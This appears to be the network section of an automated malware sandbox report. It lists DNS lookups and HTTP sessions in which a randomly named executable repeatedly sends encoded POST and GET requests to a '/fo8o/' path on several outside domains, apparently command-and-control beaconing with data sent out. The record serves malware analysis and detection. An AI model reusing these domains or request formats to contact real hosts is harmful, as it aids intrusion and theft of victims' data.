                                                                                Dec 24, 2024 08:26:02.012259007 CET4999180192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:02.131942987 CET804999166.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:03.241569996 CET804999166.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:03.241828918 CET804999166.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:03.241889954 CET4999180192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:03.518296003 CET4999180192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:04.541717052 CET4999280192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:04.666054964 CET804999266.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:04.669610977 CET4999280192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:04.669610977 CET4999280192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:04.789804935 CET804999266.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:05.911892891 CET804999266.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:05.911927938 CET804999266.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:05.911973000 CET4999280192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:06.174623966 CET4999280192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:07.193877935 CET4999380192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:07.313463926 CET804999366.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:07.313568115 CET4999380192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:07.316011906 CET4999380192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:07.435723066 CET804999366.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:07.435817957 CET804999366.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:08.609363079 CET804999366.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:08.609491110 CET804999366.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:08.610012054 CET4999380192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:08.831043959 CET4999380192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:09.851074934 CET4999480192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:09.970818996 CET804999466.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:09.970916033 CET4999480192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:09.974004984 CET4999480192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:10.094927073 CET804999466.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:11.200171947 CET804999466.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:11.200232029 CET804999466.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:11.200375080 CET4999480192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:11.203862906 CET4999480192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:11.323468924 CET804999466.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:16.927803040 CET4999580192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:17.047622919 CET8049995195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:17.049753904 CET4999580192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:17.053678989 CET4999580192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:17.173268080 CET8049995195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:18.365266085 CET8049995195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:18.365376949 CET8049995195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:18.367887974 CET4999580192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:18.565241098 CET4999580192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:19.585092068 CET4999680192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:19.705005884 CET8049996195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:19.705106020 CET4999680192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:19.707659006 CET4999680192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:19.827503920 CET8049996195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:21.013710022 CET8049996195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:21.013905048 CET8049996195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:21.014134884 CET4999680192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:21.221443892 CET4999680192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:22.240015984 CET4999780192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:22.360059023 CET8049997195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:22.361773014 CET4999780192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:22.363699913 CET4999780192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:22.483494043 CET8049997195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:22.483539104 CET8049997195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:23.672518015 CET8049997195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:23.672736883 CET8049997195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:23.672797918 CET4999780192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:23.877904892 CET4999780192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:24.897011995 CET4999880192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:25.016808987 CET8049998195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:25.016957998 CET4999880192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:25.018898964 CET4999880192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:25.138454914 CET8049998195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:26.330123901 CET8049998195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:26.330188036 CET8049998195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:26.330372095 CET4999880192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:26.333156109 CET4999880192.168.2.5195.110.124.133
                                                                                Dec 24, 2024 08:26:26.452872992 CET8049998195.110.124.133192.168.2.5
                                                                                Dec 24, 2024 08:26:48.397732019 CET4999980192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:48.517299891 CET8049999217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:48.522085905 CET4999980192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:48.525791883 CET4999980192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:48.645292044 CET8049999217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:49.799134016 CET8049999217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:49.799676895 CET8049999217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:49.799720049 CET4999980192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:50.034008980 CET4999980192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:51.053756952 CET5000080192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:51.173360109 CET8050000217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:51.173477888 CET5000080192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:51.177751064 CET5000080192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:51.297264099 CET8050000217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:52.374905109 CET8050000217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:52.375025034 CET8050000217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:52.380858898 CET5000080192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:52.693753004 CET5000080192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:53.715574980 CET5000180192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:53.835297108 CET8050001217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:53.835386038 CET5000180192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:53.837863922 CET5000180192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:53.957551956 CET8050001217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:53.957562923 CET8050001217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:55.035578012 CET8050001217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:55.035623074 CET8050001217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:55.035774946 CET5000180192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:55.346410036 CET5000180192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:56.364775896 CET5000280192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:56.485702991 CET8050002217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:56.485817909 CET5000280192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:56.487705946 CET5000280192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:56.608500004 CET8050002217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:57.687829018 CET8050002217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:57.688011885 CET8050002217.196.55.202192.168.2.5
                                                                                Dec 24, 2024 08:26:57.688066959 CET5000280192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:57.691257954 CET5000280192.168.2.5217.196.55.202
                                                                                Dec 24, 2024 08:26:57.810801029 CET8050002217.196.55.202192.168.2.5
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 24, 2024 08:23:32.153824091 CET5698353192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:23:32.937932968 CET53569831.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:23:50.428287983 CET6455353192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:23:50.828819036 CET53645531.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:23:58.943700075 CET6360053192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:23:59.658977985 CET53636001.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:24:14.444183111 CET6384253192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:24:14.670141935 CET53638421.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:24:22.777465105 CET5764153192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:24:23.442274094 CET53576411.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:25:37.866753101 CET6208753192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:25:38.228475094 CET53620871.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:25:52.975785017 CET5614053192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:25:53.197678089 CET53561401.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:26:01.256917000 CET4921253192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:26:01.887883902 CET53492121.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:26:16.211966038 CET6425553192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:26:16.920573950 CET53642551.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:26:31.350543976 CET5647053192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:26:31.576812029 CET53564701.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:26:39.632222891 CET5050053192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:26:39.847498894 CET53505001.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:26:47.933340073 CET5118153192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:26:48.391799927 CET53511811.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:27:02.710113049 CET6309653192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:27:02.935139894 CET53630961.1.1.1192.168.2.5
                                                                                Dec 24, 2024 08:27:10.990312099 CET6523153192.168.2.51.1.1.1
                                                                                Dec 24, 2024 08:27:11.411546946 CET53652311.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 24, 2024 08:23:32.153824091 CET192.168.2.51.1.1.10x5563Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:23:50.428287983 CET192.168.2.51.1.1.10xb24fStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:23:58.943700075 CET192.168.2.51.1.1.10x7193Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:14.444183111 CET192.168.2.51.1.1.10x8de5Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:22.777465105 CET192.168.2.51.1.1.10xbdc3Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:25:37.866753101 CET192.168.2.51.1.1.10x80faStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:25:52.975785017 CET192.168.2.51.1.1.10x93d3Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:01.256917000 CET192.168.2.51.1.1.10x62c0Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:16.211966038 CET192.168.2.51.1.1.10x527bStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:31.350543976 CET192.168.2.51.1.1.10x82cfStandard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:39.632222891 CET192.168.2.51.1.1.10xc684Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:47.933340073 CET192.168.2.51.1.1.10xf08bStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:27:02.710113049 CET192.168.2.51.1.1.10x1664Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:27:10.990312099 CET192.168.2.51.1.1.10xa19fStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 24, 2024 08:23:32.937932968 CET1.1.1.1192.168.2.50x5563No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:23:50.828819036 CET1.1.1.1192.168.2.50xb24fName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:23:59.658977985 CET1.1.1.1192.168.2.50x7193No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:14.670141935 CET1.1.1.1192.168.2.50x8de5Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:23.442274094 CET1.1.1.1192.168.2.50xbdc3No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:23.442274094 CET1.1.1.1192.168.2.50xbdc3No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 24, 2024 08:24:23.442274094 CET1.1.1.1192.168.2.50xbdc3No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:25:38.228475094 CET1.1.1.1192.168.2.50x80faNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:25:53.197678089 CET1.1.1.1192.168.2.50x93d3Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:01.887883902 CET1.1.1.1192.168.2.50x62c0No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:16.920573950 CET1.1.1.1192.168.2.50x527bNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:16.920573950 CET1.1.1.1192.168.2.50x527bNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:31.576812029 CET1.1.1.1192.168.2.50x82cfName error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:39.847498894 CET1.1.1.1192.168.2.50xc684Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:48.391799927 CET1.1.1.1192.168.2.50xf08bNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 24, 2024 08:26:48.391799927 CET1.1.1.1192.168.2.50xf08bNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:27:02.935139894 CET1.1.1.1192.168.2.50x1664Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Dec 24, 2024 08:27:11.411546946 CET1.1.1.1192.168.2.50xa19fName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                • www.3xfootball.com
                                                                                • www.goldenjade-travel.com
                                                                                • www.magmadokum.com
                                                                                • www.rssnewscast.com
                                                                                • www.techchains.info
                                                                                • www.elettrosistemista.zip
                                                                                • www.empowermedeco.com
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549732154.215.72.110803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:23:33.859038115 CET514OUTGET /fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.3xfootball.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:23:35.385493040 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 24 Dec 2024 07:23:35 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549788116.50.37.244803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:23:59.782883883 CET799OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.goldenjade-travel.com
                                                                                Origin: http://www.goldenjade-travel.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                Data Ascii: UzG=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
                                                                                Dec 24, 2024 08:24:01.294707060 CET492INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html; charset=us-ascii
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 07:24:00 GMT
                                                                                Connection: close
                                                                                Content-Length: 315
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549800116.50.37.244803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:02.423640013 CET819OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.goldenjade-travel.com
                                                                                Origin: http://www.goldenjade-travel.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
                                                                                Data Ascii: UzG=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
                                                                                Dec 24, 2024 08:24:03.927052975 CET492INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html; charset=us-ascii
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 07:24:03 GMT
                                                                                Connection: close
                                                                                Content-Length: 315
